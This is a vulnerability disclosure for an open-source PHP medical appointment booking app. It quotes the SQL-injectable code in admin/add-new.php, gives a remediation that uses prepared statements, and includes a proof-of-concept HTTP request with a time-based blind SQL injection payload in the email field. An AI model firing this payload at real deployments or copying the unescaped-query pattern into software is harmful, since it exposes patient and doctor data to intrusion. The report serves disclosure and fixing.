This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.
In admin/add-new.php, starting at line 47, the $email parameter is attacker-controllable: it is read straight from the POST parameter email and is not protected against SQL injection. At line 54, $result= $database->query("select * from webuser where email='$email';"); interpolates the value directly into the query string, which causes SQL injection.
if($_POST){
    //print_r($_POST);
    $result= $database->query("select * from webuser");
    $name=$_POST['name'];
    $nic=$_POST['nic'];
    $spec=$_POST['spec'];
    $email=$_POST['email'];          // taken straight from the POST body, no validation or escaping
    $tele=$_POST['Tele'];
    $password=$_POST['password'];
    $cpassword=$_POST['cpassword'];
    if ($password==$cpassword){
        $error='3';
        // injection point: $email is concatenated unescaped into the SQL string
        $result= $database->query("select * from webuser where email='$email';");
        if($result->num_rows==1){
            $error='1';
        }else{
            // the same unescaped values are also interpolated into both inserts
            $sql1="insert into doctor(docemail,docname,docpassword,docnic,doctel,specialties) values('$email','$name','$password','$nic','$tele',$spec);";
            $sql2="insert into webuser values('$email','d')";
            $database->query($sql1);
            $database->query($sql2);
            //echo $sql1;
            //echo $sql2;
            $error= '4';
        }
    }else{
        $error='2';
    }
}else{
    //header('location: signup.php');
    $error='3';
}
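As an added example (not the project's code), the same branch rewritten so that user input reaches MySQL only as bound parameters; it assumes $database is a mysqli connection, as the original ->query()/->num_rows usage suggests, and the function name add_doctor is hypothetical.

```php
<?php
// Added example (not the project's code): the add-new.php branch above rewritten so that
// user input reaches MySQL only as bound parameters. Assumes $database is a mysqli
// connection, as the original ->query()/->num_rows usage suggests. Return values
// mirror the $error codes the original sets ('1' duplicate, '2' mismatch, '4' created).
function add_doctor(mysqli $database, array $post): string
{
    $name      = $post['name']      ?? '';
    $nic       = $post['nic']       ?? '';
    $spec      = (int)($post['spec'] ?? 0);  // the original interpolated this unquoted
    $email     = $post['email']     ?? '';
    $tele      = $post['Tele']      ?? '';
    $password  = $post['password']  ?? '';
    $cpassword = $post['cpassword'] ?? '';

    if ($password !== $cpassword) {
        return '2';
    }

    // Existence check with a placeholder: a quote in $email (as in the PoC payload below)
    // is now plain data, so no SLEEP() or other SQL can be appended to the query.
    $stmt = $database->prepare("SELECT 1 FROM webuser WHERE email = ? LIMIT 1");
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $stmt->store_result();
    $exists = $stmt->num_rows === 1;
    $stmt->close();
    if ($exists) {
        return '1';
    }

    // Both inserts in one transaction: with mysqli exception reporting (PHP 8.1 default)
    // a failed insert throws before commit(). $password is stored as given, like the
    // original; hashing it is a separate fix that also needs the login check updated.
    $database->begin_transaction();
    $stmt = $database->prepare(
        "INSERT INTO doctor (docemail, docname, docpassword, docnic, doctel, specialties)
         VALUES (?, ?, ?, ?, ?, ?)"
    );
    $stmt->bind_param('sssssi', $email, $name, $password, $nic, $tele, $spec);
    $stmt->execute();
    $stmt->close();

    $stmt = $database->prepare("INSERT INTO webuser VALUES (?, 'd')");
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $stmt->close();
    $database->commit();
    return '4';
}
```

In the page, the original if/else block would be replaced by `$error = add_doctor($database, $_POST);` when $_POST is non-empty.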
PoC (HTTP request):
POST /admin/add-new.php HTTP/1.1
Host: 192.168.0.104
Content-Length: 61
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.104
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.104/admin/doctors.php?action=add&error=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=mpu5jiv1ln63f3hrl1avff7if7
Connection: close
name=1&email=' AND (SELECT 7810 FROM (SELECT(SLEEP(5)))POrN) AND 'FCcW'='FCcW&nic=4&Tele=5&spec=1&password=6&cpassword=6
Attack result screenshots (images not reproduced here)